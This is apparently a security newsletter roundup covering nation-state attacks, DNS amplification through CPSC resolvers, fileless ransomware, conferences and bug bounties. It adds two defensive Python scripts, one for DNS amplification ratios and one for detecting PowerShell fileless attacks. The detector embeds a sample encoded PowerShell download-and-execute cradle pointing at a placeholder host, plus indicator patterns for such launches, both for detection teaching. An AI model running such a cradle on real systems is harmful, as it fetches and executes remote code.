Reports and evaluations
The recent G20 economic summit held in China had numerous discussions about economic cooperation among the member nations, but one item not on the agenda was how to fight cyber crime. Apart from a brief mention in a meeting between Obama and Putin, it wasn’t addressed at all. This post looks at various nation-on-nation attacks over the recent past and suggests that the world leaders “should also have addressed cybersecurity issues that pose such large and growing economic and strategic threats.” – DEFENSE ONE
The flight of Ed Snowden from Hong Kong to Russia is mostly well known, and a new Oliver Stone movie will be out this week about the NSA leaker. But what is less well known is how his escape was engineered. In this post, the principals involved in getting him out of Hong Kong were interviewed and tell how he was hidden and transported to different apartments before leaving the country and then having his passport revoked. – NATIONAL POST
One unexpected pairing is the Consumer Product Safety Commission’s DNS resolver and its use in DDoS attacks. This report from security researchers shows how attackers can use the CPSC DNS servers to amplify their activities, since the servers return a very large record in response to small queries. Researchers have found the CPSC servers present in nearly all of their observed DNS hacks. – CLOUDFLARE BLOG
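The Cloudflare item turns on a single ratio: how many response bytes a resolver sends per query byte. The script below is an added example, not code from the Cloudflare post or from the CPSC, showing the defender-side arithmetic. It assumes a simple resolver log format (timestamp, client IP, query type, query name, query bytes, response bytes per line; the sample lines and sizes are constructed), flags responses that exceed an amplification threshold, and totals the bytes sent to each source address, which is where a reflection victim shows up.

```python
"""Amplification-ratio check over constructed DNS resolver log lines.

Added example (not the Cloudflare post's code). The one-line-per-exchange log
format is an assumption; adapt parse_log() to your resolver's real format.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample lines; addresses and byte counts are made up for illustration.
SAMPLE_LOG = """\
2016-09-06T10:00:01Z 198.51.100.7 A www.example.test 45 61
2016-09-06T10:00:01Z 203.0.113.9 ANY example.test 36 3100
2016-09-06T10:00:02Z 203.0.113.9 ANY example.test 36 3100
2016-09-06T10:00:02Z 198.51.100.8 AAAA mail.example.test 48 76
2016-09-06T10:00:03Z 203.0.113.9 TXT big.example.test 40 2900
"""


@dataclass
class DnsRecord:
    ts: str
    client: str
    qtype: str
    qname: str
    query_bytes: int
    response_bytes: int

    @property
    def ratio(self) -> float:
        """Response bytes per query byte: the amplification factor."""
        return self.response_bytes / self.query_bytes


def parse_log(text: str) -> List[DnsRecord]:
    """Parse the assumed whitespace-separated log format into records."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qtype, qname, qb, rb = line.split()
        records.append(DnsRecord(ts, client, qtype, qname, int(qb), int(rb)))
    return records


def flag_amplified(records: List[DnsRecord], min_ratio: float = 10.0) -> List[DnsRecord]:
    """Return the exchanges whose response is at least min_ratio times the query."""
    return [r for r in records if r.ratio >= min_ratio]


def bytes_per_client(records: List[DnsRecord]) -> Dict[str, int]:
    """Total response bytes sent to each source IP (spoofed sources are the victim)."""
    totals: Dict[str, int] = defaultdict(int)
    for r in records:
        totals[r.client] += r.response_bytes
    return dict(totals)


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for r in flag_amplified(recs):
        print(f"{r.ts} {r.client} {r.qtype} {r.qname}: {r.ratio:.1f}x")
    print(bytes_per_client(recs))
```

With the constructed lines, the two ANY and one TXT exchanges are flagged at 86x and 72x, and the 9,100 bytes sent to 203.0.113.9 stand out against the two ordinary lookups. Resolver operators who run this kind of check also typically rate-limit large responses (response rate limiting) and answer large queries over TCP rather than UDP.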
OPSWAT is a great resource for security education and their upcoming (and free!) Symposium in Silicon Valley later this month should be on your radar. They will provide updates on their tools such as Metadefender along with vendor demos and malware research. – CONFERENCE SITE
Global cybercrime-fighting association APWG.EU is hosting its eCrime 2016 program on October 5-7 in Bratislava, Slovakia, presenting advanced data analysis and data exchange schemes to automate the global response to cybercrime. – CONFERENCE SITE
The National Initiative for Cybersecurity Education is having their annual conference November 1 in Kansas City. The event features two days’ worth of public/private executives and stakeholders in infosec education, sponsored by the National Institute of Standards and the US Department of Commerce. Keynotes are by the founder of Opportunity@Work, and the president of BAE Systems. – NICE CONFERENCE SITE
This blog has put together a nice list of noteworthy NYC-based infosec events called Empire Hacking. As they say, “industry professionals have much to learn from emerging academic innovations and we hope to bring them together.” – TRAIL OF BITS BLOG
Graphs of the week
Ever wondered what it looks like when an entire country goes offline? Here you go. The folks at Cloudflare have tracked the blackout happening in Gabon. Reuters reports political unrest and massive rioting after a contested election. After turning off the Internet for several days, the government has imposed 12-hour Internet curfews each evening, as you can see in the graphic. -- CLOUDFLARE
Here is how fileless ransomware typically works, where malware is embedded into a scripting language or written straight to memory, using PowerShell commands. – CROWDSTRIKE BLOG
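Because fileless ransomware leaves no binary on disk, the place to look for it is the command line PowerShell was launched with. The script below is an added example, not code from the CrowdStrike post: it scans constructed process-creation log lines (an assumed "timestamp host user command_line" layout) for the indicators a defender watches for when a script is executed straight from memory, such as an encoded command, Invoke-Expression, a download cradle and a hidden window, and decodes the Base64 UTF-16LE payload so the analyst can see what actually ran. Host names, user names and the URL are made up.

```python
"""Flag PowerShell command lines carrying fileless-execution indicators.

Added example, not the CrowdStrike post's code. The log layout
("timestamp host user command_line") and the sample lines are assumptions.
"""
import base64
import re
from typing import Dict, List

# Constructed encoded payload: what a defender would find in an -enc argument.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
    .encode("utf-16le")
).decode("ascii")

# Constructed process-creation log lines (not real telemetry).
SAMPLE_LOG = [
    "2016-09-06T09:12:44Z WS01 alice powershell.exe -File C:\\scripts\\backup.ps1",
    f"2016-09-06T09:13:02Z WS07 bob powershell.exe -nop -w hidden -enc {_ENCODED}",
    "2016-09-06T09:13:05Z WS07 bob cmd.exe /c dir",
    "2016-09-06T09:14:10Z WS03 carol powershell.exe -Command \"Get-Process | Out-File p.txt\"",
]

# Indicator name -> case-insensitive regex applied to the command line plus
# its decoded payload, so indicators hidden inside -EncodedCommand still count.
INDICATORS = {
    "encoded_command": r"-(?:e|ec|enc|encodedcommand)\b",
    "invoke_expression": r"\b(?:iex|invoke-expression)\b",
    "download_cradle": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b",
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "no_profile": r"-nop\b|-noprofile\b",
}

_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE plaintext of an -EncodedCommand argument, or ''."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify(line: str) -> Dict[str, object]:
    """Split one log line and list the indicators it matches."""
    ts, host, user, cmdline = line.split(" ", 3)
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + " " + decoded
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, haystack, re.I)]
    return {"ts": ts, "host": host, "user": user, "hits": hits, "decoded": decoded}


def suspicious(lines: List[str], min_hits: int = 2) -> List[Dict[str, object]]:
    """Report only PowerShell launches that match at least min_hits indicators."""
    out = []
    for line in lines:
        if "powershell" not in line.lower():
            continue
        rec = classify(line)
        if len(rec["hits"]) >= min_hits:
            out.append(rec)
    return out


if __name__ == "__main__":
    for rec in suspicious(SAMPLE_LOG):
        print(rec["ts"], rec["host"], rec["user"], rec["hits"])
        if rec["decoded"]:
            print("  decoded:", rec["decoded"])
```

Requiring two or more indicators keeps the scheduled backup script and the interactive Get-Process line out of the report while the hidden, encoded, profile-less launch on WS07 matches all five. In a real deployment the same logic runs over Sysmon or Windows Security 4688 command-line events, and PowerShell script block logging supplies the de-obfuscated script even when the launch itself looks clean.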
Noteworthy podcasts and webinars
This 25-minute video shows you how local administrator attacks were used to spread attacks inside an enterprise; they explain how it works and how to stop it. The video tutorial is based on their experience of a hundred different white-hat attacks. This is one of a series of other attacks they have produced videos on. – PRAETORIAN
Bug-finding programs are valuable to enterprises, but they require a lot of planning and effort to be effective. Here is what you need to know before you implement a bounty program, including specific focus, how to work with security researchers, how much to offer as a bounty, whether to employ a third-party bounty management vendor and other elements. -- SEARCHSECURITY
This week Yelp announced its own bug bounty program; they will offer up to $15,000 for proven vulnerabilities. This expands a private program they have been running for two years that previously had a top bounty of $2000 and payouts of more than $65,000. The scope of the new program will include Yelp's consumer site, its business owner's site, mobile apps, its reservations site and apps, the firm's public API, support site, and its blogs. – DARK READING
Just for fun
Love those Apple ads and can speak Russian? Then you might enjoy this post, which talks about a new political campaign ad that spoofs the sparse simplicity of Apple that is running right now in Russia. -- BBC
Here is how the Mozilla community can be a good first step for newbie open source developers. It is more informative than funny, but still interesting to read how this one developer got her way into becoming more influential within one community. – DEV.TO